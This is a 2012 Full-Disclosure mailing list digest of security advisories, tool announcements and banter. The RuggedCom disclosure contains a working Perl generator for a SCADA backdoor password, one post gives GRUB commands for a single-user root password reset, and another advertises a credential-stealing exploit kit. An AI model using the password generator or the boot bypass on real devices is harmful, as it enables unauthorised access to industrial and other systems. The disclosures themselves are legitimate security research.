[Full-disclosure] OpenSSL Security Advisory
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 OpenSSL Security Advisory [24 Apr 2012] === ASN1 BIO incomplete fix (CVE-2012-2131) === It was discovered that the fix for CVE-2012-2110 released on 19 Apr 2012 was not sufficient to correct the issue for OpenSSL 0.9.8. Please see http://www.openssl.org/news/secadv_20120419.txt for details of that vulnerability. This issue only affects OpenSSL 0.9.8v. OpenSSL 1.0.1a and 1.0.0i already contain a patch sufficient to correct CVE-2012-2110. Thanks to Red Hat for discovering and fixing this issue. Affected users should upgrade to 0.9.8w. References == URL for this Security Advisory: http://www.openssl.org/news/secadv_20120424.txt -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iQCVAwUBT5ZV8+6tTP1JpWPZAQIQHwQAvrWr3lRsvFkskFR1apYn/xf0l7cUABGX HUUtmDRQJuYFyK0UMdInvcrZ7W82FhzzuGNLwnwI5b8Ttn4oOwcntM335WMf8d10 O4S7OjJmjpNEM1Lb0Ik9ZQdxJTepuWgG4iNKXtZIMdY8amCC+a0jPcwDzji2RfHP OKUh7LxTI5E= =HggZ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fwd: Vulnerability research and exploit writing
Hi, Anybody else got this message? I think they are spamming the subscribers/regular participants of the list. -- Forwarded message -- From: steve ruskin ruskin.st...@gmail.com Date: Tue, Apr 24, 2012 at 9:56 AM Subject: Vulnerability research and exploit writing To: tyr...@gmail.com Hi , ** ** Trust all is well. I saw your experience in the field of vulnerability and exploit research and we have a scheme in our company to collaborate with researchers all over the world where we pay them on research done by them. Our interest is exploits which run over Windows 7, Snow Leopard with applications such MS Office, Adobe, Browsers, Media Player , Notepad etc along with native OS exploits as well as iphone, blackberry exploit. These exploits should be unpublished though the vulnerability may be public. We also have requirements to help us do ASLR and DEP bypass for exploits researched by us. ** ** Once you let us know about your skills and ideas we can provide you with our empanelment form via which you can register. We will look forward to your prompt response. ** ** Warm Regards, Steve Ruskin ** -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cross Site Scripting - Exploitation Penetration Strings
Title: == Cross Site Scripting - Exploitation Penetration Strings Date: = 2012-04-23 References: === Download: http://www.vulnerability-lab.com/resources/documents/531.txt VL-ID: = 531 Status: Published Exploitation-Technique: === Sheets Severity: = High Details: A lot of people asked us regarding our cross site scripting pentest sheet for a fuzzer or own scripts. To have some good results you can use the following list with automatic scripts, software or for manually pentesting. This list goes out to all friends, nerds, pentester exploiters. Please continue the List and we will update it soon. Note: This is a technical attack sheet for cross site penetrationtests. Credits: Vulnerability Laboratory [Research Team] Disclaimer: === The information provided in this document is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012 Vulnerability-Lab -- VULNERABILITY RESEARCH LABORATORY TEAM Website: www.vulnerability-lab.com Mail: resea...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Microsoft Incremental Linker Integer Overflow
Is available at: http://waleedassar.blogspot.com/2012/04/microsoft-incremental-linker-integer.html Waliedassar ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] RuggedCom - Backdoor Accounts in my SCADA network? You don't say...
Title: Undocumented Backdoor Access to RuggedCom Devices
Author:jc
Organization: JC CREW
Date: April 23, 2012
CVE: CVE-2012-1803
Background:
RuggedCom is one of a handful of networking vendors who capitalize on
the market for Industrial Strength and Hardened networking
equipment. You'll find their gear installed in traffic control
systems, railroad communications systems, power plants, electrical
substations, and even US military sites. Beyond simple L2 and L3
networking these devices are also used for serial-to-ip converstion in
SCADA systems and they even support modbus and dnp3. RuggedCom
published a handy guide to some of their larger customers at
www.ruggedcom.com/about/customers/. My favorite quote is from a
contractor who installed RuggedCom equipment at a US Air Force base:
Reliability was not an option. How unfortunately apropos.
Problem:
An undocumented backdoor account exists within all released versions
of RuggedCom's Rugged Operating System (ROS®). The username for the
account, which cannot be disabled, is factory and its password is
dynamically generated based on the device's MAC address. Multiple
attempts have been made in the past 12 months to have this backdoor
removed and customers notified.
Exploit:
#!/usr/bin/perl
if (! defined $ARGV[0]) {
print +== \n;
print + RuggedCom ROS Backdoor Password Generator \n;
print + JC CREW April 23 2012 \n;
print + Usage:\n$0 macaddress \n;
print +== \n;
exit; }
$a = $ARGV[0];
$a =~ s/[^A-F0-9]+//simg;
@b = reverse split /(\S{2})/,$a;
$c = join , @b;
$c .= ;
$d = hex($c) % 99929;
print $d\n;
Example usage:
Given a RuggedCom device with MAC address 00-0A-DC-00-00-00, run some
perl and learn that the password for factory is 60644375.
[j...@pig.aids ros]$ ./ruggedfail.pl 00-0A-DC-00-00-00
60644375
[j...@pig.aids ros]$
Shoutouts:
CERT/CC for doing great work in trying to get vendors to actually fix things.
JC CREW
Timeline:
Apr 2011 - Vendor notified directly
Jul 2011 - Vendor verbally acknowledges knowledge of backdoor,
and ceases communication.
Feb 11 2012 - US-CERT notified
Mar 12 2012 - Vendor responds to US-CERT.
Apr 06 2012 - Due to lack of further contact by vendor, CERT sets
public disclosure for April 13 2012
Apr 10 2012 - Vendor states they need another three weeks to alert
their customers, but not fix the vulnerability.
Apr 11 2012 - Clarification requested regarding need for additional three weeks.
Apr 23 2012 - No response from vendor.
Apr 23 2012 - This disclosure.
Keywords:
RuggedCom
ROS
RuggedSwitch
RuggedServer
backdoor
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [New tool] - Exploit Pack - Web Security
Exploit Pack - Web Security Edition This tool allows you to take control of remote browsers, steal social network credentials, obtain persistence on it, DDoS and more. Demo: http://www.youtube.com/watch?v=B_AYyRFNokI Main features: - Hacking of Gmail, Yahoo, Facebook, Live, Linkedin - Session persistence - 0day exploits included - Remote browser control - DDoS by creating botnets - Launch remote exploits - Steal credentials Questions? supp...@exploitpack.com Official site: http://exploitpack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New IETF I-D: Security Implications of IPv6 on IPv4 networks
Folks, We've published a new IETF I-D entitled Security Implications of IPv6 on IPv4 networks. The I-D is available at: http://www.ietf.org/id/draft-gont-opsec-ipv6-implications-on-ipv4-nets-00.txt The Abstract of the I-D is: cut here This document discusses the security implications of native IPv6 support and IPv6 transition/co-existence technologies on IPv4-only networks, and describes possible mitigations for the aforementioned issues. cut here Any feedback will be very welcome. Thanks! Best regards, -- Fernando Gont SI6 Networks e-mail: fg...@si6networks.com PGP Fingerprint: 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [New tool] - Exploit Pack - Web Security
Hi, I think that people here would be more interested by the (new?) techniques you're using in your tool than by your own (not documented?) implementation. ie: are you using MSF browser autopwn technique for browser control? (Or, will we have to spend individually 3 days to review and test your tool?) My 2 cts /JA Le 23/04/2012 21:52, runlvl a écrit : Exploit Pack - Web Security Edition This tool allows you to take control of remote browsers, steal social network credentials, obtain persistence on it, DDoS and more. Demo: http://www.youtube.com/watch?v=B_AYyRFNokI Main features: - Hacking of Gmail, Yahoo, Facebook, Live, Linkedin - Session persistence - 0day exploits included - Remote browser control - DDoS by creating botnets - Launch remote exploits - Steal credentials Questions? supp...@exploitpack.com Official site: http://exploitpack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Jerome Athias - NETpeas VP, Director of Software Engineer Palo Alto - Paris - Casablanca www.netpeas.com - Stay updated on Security: www.vulnerabilitydatabase.com The computer security is an art form. It's the ultimate martial art. smime.p7s Description: Signature cryptographique S/MIME ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [New tool] - Exploit Pack - Web Security
I'm also wondering if your tool is a clone of our BeEF or not :D Cheers antisnatchor On Tue, Apr 24, 2012 at 11:25 AM, Jerome Athias jer...@netpeas.com wrote: Hi, I think that people here would be more interested by the (new?) techniques you're using in your tool than by your own (not documented?) implementation. ie: are you using MSF browser autopwn technique for browser control? (Or, will we have to spend individually 3 days to review and test your tool?) My 2 cts /JA Le 23/04/2012 21:52, runlvl a écrit : Exploit Pack - Web Security Edition This tool allows you to take control of remote browsers, steal social network credentials, obtain persistence on it, DDoS and more. Demo: http://www.youtube.com/watch?v=B_AYyRFNokI Main features: - Hacking of Gmail, Yahoo, Facebook, Live, Linkedin - Session persistence - 0day exploits included - Remote browser control - DDoS by creating botnets - Launch remote exploits - Steal credentials Questions? supp...@exploitpack.com Official site: http://exploitpack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Jerome Athias - NETpeas VP, Director of Software Engineer Palo Alto - Paris - Casablanca www.netpeas.com - Stay updated on Security: www.vulnerabilitydatabase.com The computer security is an art form. It's the ultimate martial art. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- /antisnatchor ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [New tool] - Exploit Pack - Web Security
s/clone/theft/ On Tue, Apr 24, 2012 at 12:31 PM, Michele Orru antisnatc...@gmail.com wrote: I'm also wondering if your tool is a clone of our BeEF or not :D Cheers antisnatchor On Tue, Apr 24, 2012 at 11:25 AM, Jerome Athias jer...@netpeas.com wrote: Hi, I think that people here would be more interested by the (new?) techniques you're using in your tool than by your own (not documented?) implementation. ie: are you using MSF browser autopwn technique for browser control? (Or, will we have to spend individually 3 days to review and test your tool?) My 2 cts /JA Le 23/04/2012 21:52, runlvl a écrit : Exploit Pack - Web Security Edition This tool allows you to take control of remote browsers, steal social network credentials, obtain persistence on it, DDoS and more. Demo: http://www.youtube.com/watch?v=B_AYyRFNokI Main features: - Hacking of Gmail, Yahoo, Facebook, Live, Linkedin - Session persistence - 0day exploits included - Remote browser control - DDoS by creating botnets - Launch remote exploits - Steal credentials Questions? supp...@exploitpack.com Official site: http://exploitpack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Jerome Athias - NETpeas VP, Director of Software Engineer Palo Alto - Paris - Casablanca www.netpeas.com - Stay updated on Security: www.vulnerabilitydatabase.com The computer security is an art form. It's the ultimate martial art. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- /antisnatchor ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerability in Backtrack
Is good evening. I is would like to warn you about is vulnerability in Backtrack is all version. Backtrack Linux is penetration tester is system. Is come complete with tool for to make hacking for penetration tester. In is booting Backtrack, vulnerability exist in booting for when start if attacker is edit grub, attacker can bypass restricted user and is boot into admin account. E.g.: grub edit kernel /boom/vmlinuz-2.3.11.7 root=/dev/sda1 ro Single [ENTER] grub edit b # mount -t proc proc /proc # mount -o remount,rw / # passwd [ENTER IS ANYTHING YOU WANT] # sync # reboot I is will make this into video for bypassing security in Backtrack for to post on InfoSecInstitute -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2012:064 ] openssl0.9.8
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:064 http://www.mandriva.com/security/ ___ Package : openssl0.9.8 Date: April 24, 2012 Affected: 2010.1 ___ Problem Description: It was discovered that the fix for CVE-2012-2110 (MDVSA-2012:060) was not sufficient to correct the issue for OpenSSL 0.9.8. The updated packages have been upgraded to the 0.9.8w version which is not vulnerable to this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2131 http://www.openssl.org/news/secadv_20120424.txt ___ Updated Packages: Mandriva Linux 2010.1: df65e3a8edab86c687b6645d55a4f340 2010.1/i586/libopenssl0.9.8-0.9.8w-0.1mdv2010.2.i586.rpm 21a3c6bd6d1af90b3f3851e5fc7ab4fe 2010.1/SRPMS/openssl0.9.8-0.9.8w-0.1mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: 069004c734e0e66259df707b0038e273 2010.1/x86_64/lib64openssl0.9.8-0.9.8w-0.1mdv2010.2.x86_64.rpm 21a3c6bd6d1af90b3f3851e5fc7ab4fe 2010.1/SRPMS/openssl0.9.8-0.9.8w-0.1mdv2010.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFPlocKmqjQ0CJFipgRAtYsAJ48iRwUZW1augllR69tfa6eGy8s1gCfS1SN zDvK0/gNHS1dBZUStoXF+Y4= =CH2i -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability in Backtrack
*sigh* vulnerability reports like this make me sad. On Apr 24, 2012 5:50 AM, Григорий Братислава musntl...@gmail.com wrote: Is good evening. I is would like to warn you about is vulnerability in Backtrack is all version. Backtrack Linux is penetration tester is system. Is come complete with tool for to make hacking for penetration tester. In is booting Backtrack, vulnerability exist in booting for when start if attacker is edit grub, attacker can bypass restricted user and is boot into admin account. E.g.: grub edit kernel /boom/vmlinuz-2.3.11.7 root=/dev/sda1 ro Single [ENTER] grub edit b # mount -t proc proc /proc # mount -o remount,rw / # passwd [ENTER IS ANYTHING YOU WANT] # sync # reboot I is will make this into video for bypassing security in Backtrack for to post on InfoSecInstitute -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability in Backtrack
It makes me laugh! hahahaha 2012/4/24 Gage Bystrom themadichi...@gmail.com *sigh* vulnerability reports like this make me sad. On Apr 24, 2012 5:50 AM, Григорий Братислава musntl...@gmail.com wrote: Is good evening. I is would like to warn you about is vulnerability in Backtrack is all version. Backtrack Linux is penetration tester is system. Is come complete with tool for to make hacking for penetration tester. In is booting Backtrack, vulnerability exist in booting for when start if attacker is edit grub, attacker can bypass restricted user and is boot into admin account. E.g.: grub edit kernel /boom/vmlinuz-2.3.11.7 root=/dev/sda1 ro Single [ENTER] grub edit b # mount -t proc proc /proc # mount -o remount,rw / # passwd [ENTER IS ANYTHING YOU WANT] # sync # reboot I is will make this into video for bypassing security in Backtrack for to post on InfoSecInstitute -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability in Backtrack
Next thing ya know he will publish a disclosure on the default password being toor. On Apr 24, 2012 7:41 AM, Urlan urlanc...@gmail.com wrote: It makes me laugh! hahahaha 2012/4/24 Gage Bystrom themadichi...@gmail.com *sigh* vulnerability reports like this make me sad. On Apr 24, 2012 5:50 AM, Григорий Братислава musntl...@gmail.com wrote: Is good evening. I is would like to warn you about is vulnerability in Backtrack is all version. Backtrack Linux is penetration tester is system. Is come complete with tool for to make hacking for penetration tester. In is booting Backtrack, vulnerability exist in booting for when start if attacker is edit grub, attacker can bypass restricted user and is boot into admin account. E.g.: grub edit kernel /boom/vmlinuz-2.3.11.7 root=/dev/sda1 ro Single [ENTER] grub edit b # mount -t proc proc /proc # mount -o remount,rw / # passwd [ENTER IS ANYTHING YOU WANT] # sync # reboot I is will make this into video for bypassing security in Backtrack for to post on InfoSecInstitute -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] We're now paying up to $20, 000 for web vulns in our services
I'll keep my response short simple... This is an old debate, and one which never truly resolves because the contrary opinions tend to be so deeply rooted. I have no objection to anyone wanting to earn an _honest_ living finding and reporting vulnerabilities, but somewhere along the line, some researchers seem to have taken the position following Google and similar offerings that all vendors owe them this living. They do not. Google has taken a brave (some would say irresponsible) position with this program, but this fact alone does not obligate other vendors to follow suit. I don't think anyone will (successfully) argue the relative benefits of paying a white-hat a far smaller amount than the cost of responding to a public gotchadata!, but as with many polar subjects, things are not always as simple as they may appear. There are (and will always be) legal entanglements for any company that would make such offers; especially where there is more at risk than just their code or services. It seems clear that the Goggle legal team has either had their impact on it or been told that they'll deal with things as they appear; we'll probably never know. IMHO, anyone who willingly, knowingly places customer data at risk by inviting attacks on their production systems is playing a very dangerous game. There is no guarantee that a vuln discovered by a truly honest researcher couldn't become a weapon for the dishonest researcher through secondary discovery (GoodBob found it and while it was vulnerable, EvilBob exploited it). Granted; the dishonest researcher is already looking for weak spots, but I don't think we want them stumbling onto a hole before the vendor has had time to respond to it. The odds of such an event are probably very small, but hardly zero. -Original Message- From: Michal Zalewski [mailto:lcam...@coredump.cx] Sent: Monday, April 23, 2012 12:06 To: full-disclosure; dailydave; bugtraq; websecur...@lists.webappsec.org Subject: FYI: We're now paying up to $20,000 for web vulns in our services Hey, Hopefully this won't offend the moderators: http://googleonlinesecurity.blogspot.com/2012/04/spurring-more-vulnerability-research.html I suspect I know how the debate will be shaped - and I think I can offer a personal insight. I helped shape our vulnerability reward program from the start (November 2010), and I was surprised to see that simply having an honest, no-nonsense, and highly responsive process like this... well, it works for a surprisingly high number of skilled researchers, even if you start with relatively modest rewards. This puts an interesting spin on the conundrum of the black / gray market vulnerability trade: you can't realistically outcompete all buyers of weaponized exploits, but you can make the issue a lot less relevant. By having several orders of magnitude more people reporting bugs through a white hat channel, you are probably making underground vulnerabilities a lot harder to find, and fairly short-lived. Cheers, /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Tool] Introducing plown: security scanner for Plone CMS
Hi all! We are pleased to announce the release of plown, a security tool for Plone. Despite the fact that Plone [1] is one of the most secure CMS, even the most secure system can be penetrated due to misconfigurations, use of weak passwords and if the admins never apply the patches released. Plown [2] has been developed during penetration tests on Plone sites and was used to ease the discovery of usernames and passwords, plus expose known Plone vulnerabilities that might exist on a system. What Plown does * Username enumeration * Multithreading password cracking.You can specify the login url (if different that login_form) and the number of threads (16 default) * Known vulnerability enumeration, based on urls/objects exposed. If found vulnerable, the tool informs about the vulnerability and the url of the patch * Version enumeration is planned, based on md5 hashes of static content (css, js) We hope that plown can act as an assistant to system administrators to strengthen their Plone sites. code: https://github.com/unweb/plown/ (written on python) plown home: https://unweb.me/projects/open-source/plown Links: -- [1] http://plone.org/ [2] https://unweb.me/projects/open-source/plown ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] incorrect integer conversions in OpenSSL can result in memory corruption.
+1 duke
https://twitter.com/#!/mdowd/status/192986878138523648
http://i.imgur.com/dOjJt.jpg
Buy:
http://www.amazon.com/Software-Security-Assessment-Vulnerabilities-ebook/dp/B004XVIWU2
Steal: http://uploaded.to/file/nuq1ws67/032126.chm
2012/4/19 Tavis Ormandy tav...@cmpxchg8b.com:
Incorrect integer conversions in OpenSSL can result in memory corruption.
--
CVE-2012-2110
This advisory is intended for system administrators and developers exposing
OpenSSL in production systems to untrusted data.
asn1_d2i_read_bio in OpenSSL contains multiple integer errors that can cause
memory corruption when parsing encoded ASN.1 data. This error can be exploited
on systems that parse untrusted data, such as X.509 certificates or RSA public
keys.
The following context structure from asn1.h is used to record the current
state
of the decoder:
typedef struct asn1_const_ctx_st
{
const unsigned char *p;/* work char pointer */
int eos; /* end of sequence read for indefinite encoding */
int error; /* error code to use when returning an error */
int inf; /* constructed if 0x20, indefinite is 0x21 */
int tag; /* tag from last 'get object' */
int xclass; /* class from last 'get object' */
long slen; /* length of last 'get object' */
const unsigned char *max; /* largest value of p allowed */
const unsigned char *q;/* temporary variable */
const unsigned char **pp;/* variable */
int line; /* used in error processing */
} ASN1_const_CTX;
These members are populated via calls to ASN1_get_object and asn1_get_length
which have the following prototypes
int ASN1_get_object(const unsigned char **pp,
long *plength,
int *ptag,
int *pclass,
long omax);
int asn1_get_length(const unsigned char **pp,
int *inf,
long *rl,
int max);
The lengths are always stored as signed longs, however, asn1_d2i_read_bio
casts ASN1_const_CTX-slen to a signed int in multiple locations. This
truncation can result in numerous conversion problems.
The most visible example on x64 is this cast incorrectly interpreting the
result of asn1_get_length.
222 /* suck in c.slen bytes of data */
223 want=(int)c.slen;
A simple way to demonstrate this is to prepare a DER certificate that contains
a length with the 31st bit set, like so
$ dumpasn1 testcase.crt
0 NDEF: [PRIVATE 3] {
2 2147483648: [1]
...
}
Breakpoint 2, asn1_d2i_read_bio (in=0x9173a0, pb=0x7fffd8f0) at
a_d2i_fp.c:224
224 if (want (len-off))
(gdb) list
219 }
220 else
221 {
222 /* suck in c.slen bytes of data */
223 want=(int)c.slen;
224 if (want (len-off))
225 {
226 want-=(len-off);
227 if (!BUF_MEM_grow_clean(b,len+want))
228 {
(gdb) p c.slen
$18 = 2147483648
(gdb) p want
$19 = -2147483648
This results in an inconsistent state, and will lead to memory corruption.
Affected Software
All versions of OpenSSL on all platforms up to and including version 1.0.1 are
affected.
Some attack vectors require an I32LP64 architecture, others do not.
Consequences
---
In order to explore the subtle problems caused by this, an unrelated bug in
the
OpenSSL allocator wrappers must be discussed.
It is generally expected that the realloc standard library routine should
support
reducing the size of a buffer, as well as increasing it. As ISO C99 states
The
realloc function deallocates the old object pointed to by ptr and returns a
pointer to a new object that has the size specified by size. The contents of
the
new object shall be the same as that of the old object prior to deallocation,
up to the lesser of the new and old sizes.
However, the wrapper routines from OpenSSL do not support shrinking a buffer,
due to this code:
void *CRYPTO_realloc_clean(void *str, int old_len, int num, const char *file,
int line)
{
/* ... */
ret=malloc_ex_func(num,file,line);
if(ret)
{
memcpy(ret,str,old_len);
OPENSSL_cleanse(str,old_len);
free_func(str);
}
/* ... */
return ret;
}
The old data is always copied over, regardless of whether the new size will be
enough. This allows us to turn this truncation into what is effectively:
memcpy(heap_buffer, attacker controlled buffer, attacker controlled
size);
We can reach this code by simply causing an integer to be sign extended and
truncated multiple times. These two protoypes are relevant:
int BUF_MEM_grow_clean(BUF_MEM *str, size_t len);
void *CRYPTO_realloc_clean(void *str, int old_len,
Re: [Full-disclosure] Vulnerability in Backtrack
I have a more critical vulnerability: root default password is toor ¬¬ 2012/4/24 Григорий Братислава musntl...@gmail.com Is good evening. I is would like to warn you about is vulnerability in Backtrack is all version. Backtrack Linux is penetration tester is system. Is come complete with tool for to make hacking for penetration tester. In is booting Backtrack, vulnerability exist in booting for when start if attacker is edit grub, attacker can bypass restricted user and is boot into admin account. E.g.: grub edit kernel /boom/vmlinuz-2.3.11.7 root=/dev/sda1 ro Single [ENTER] grub edit b # mount -t proc proc /proc # mount -o remount,rw / # passwd [ENTER IS ANYTHING YOU WANT] # sync # reboot I is will make this into video for bypassing security in Backtrack for to post on InfoSecInstitute -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability in Backtrack
it makes me scary! There is also on my distro! DOH! ;P On 04/24/12 16:41, Urlan wrote: It makes me laugh! hahahaha 2012/4/24 Gage Bystrom themadichi...@gmail.com *sigh* vulnerability reports like this make me sad. On Apr 24, 2012 5:50 AM, Григорий Братислава musntl...@gmail.com wrote: Is good evening. I is would like to warn you about is vulnerability in Backtrack is all version. Backtrack Linux is penetration tester is system. Is come complete with tool for to make hacking for penetration tester. In is booting Backtrack, vulnerability exist in booting for when start if attacker is edit grub, attacker can bypass restricted user and is boot into admin account. E.g.: grub edit kernel /boom/vmlinuz-2.3.11.7 root=/dev/sda1 ro Single [ENTER] grub edit b # mount -t proc proc /proc # mount -o remount,rw / # passwd [ENTER IS ANYTHING YOU WANT] # sync # reboot I is will make this into video for bypassing security in Backtrack for to post on InfoSecInstitute -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] We're now paying up to $20, 000 for web vulns in our services
IMHO, anyone who willingly, knowingly places customer data at risk by inviting attacks on their production systems is playing a very dangerous game. There is no guarantee that a vuln discovered by a truly honest researcher couldn't become a weapon for the dishonest researcher through secondary discovery I'm not sure I follow. Are you saying that the dishonest researcher will not try to find vulnerabilities if there is no reward program for the honest ones? /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerability in Gentoo hardened
El 24/04/12 14:41, Григорий Братислава escribió: Is good evening. Is good afternoon. I is would like to warn you about is vulnerability in Backtrack is all version. I is want to advise you on one failure in Gentoo Hardened at all types Backtrack Linux is penetration tester is system. Is come complete with tool for to make hacking for penetration tester. Gentoo Hardened is advanced security is system. Is come complete with hardened nucleum for to make at system is securer In is booting Backtrack, vulnerability exist in booting for when start if attacker is edit grub, attacker can bypass restricted user and is boot into admin account. E.g.: In is making Gentoo Hardened, failure exist in sysadmin at when usage if attacker is rubber hose, attacker can override authentication and is make admin account. Making simple program. E.g.: 1. Apply rubber hose for sysadmin 2. Ask at password and try it. 3. If error make 1. I is will make this into video for bypassing security in Backtrack for to post on InfoSecInstitute I is will be this for video by bypassing security at Gentoo Hardened or to post by Youtube. I is named Reservoir Dogs. PD: Bad English written on purpose, please forgive me for any correct grammar I may have used :P PD2: Григорий seeing your historial I think the mail was a joke but anyway, just in the improbable case it may not be: 1. Bad administration issues are not global to a distro issues. 2. Make sure a vulnerability is not a not so secure by design feature. 3. Really if you ever want to write a paper or something make sure you get it readen by at least two or three english speaking partners for your own sake. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] We're now paying up to $20, 000 for web vulns in our services
On Tue, Apr 24, 2012 at 11:13 AM, Michal Zalewski lcam...@coredump.cx wrote: IMHO, anyone who willingly, knowingly places customer data at risk by inviting attacks on their production systems is playing a very dangerous game. There is no guarantee that a vuln discovered by a truly honest researcher couldn't become a weapon for the dishonest researcher through secondary discovery I'm not sure I follow. Are you saying that the dishonest researcher will not try to find vulnerabilities if there is no reward program for the honest ones? /mz I'm not sure what he means either, however I know that many organizations treat security patches to the same lifecycle as features, which means sometimes upwards of a year of testing- thus giving a huge window for secondary discovery; whereas a vuln exploited in-the-wild generally has a much faster patch. Still I'm not sure how this fact is relevant, if it is at all. Perhaps if the adversary sees the vuln in unencrypted email between researcher and organization and then uses it silently making sure not to alert anyone? Not sure, but I digress. I don't know who believes that they are owed anything in this manner, and I agree with you, Jim, on that point. However, my main complaint is that businesses should either not pay anything at all (perhaps 1$ as a token 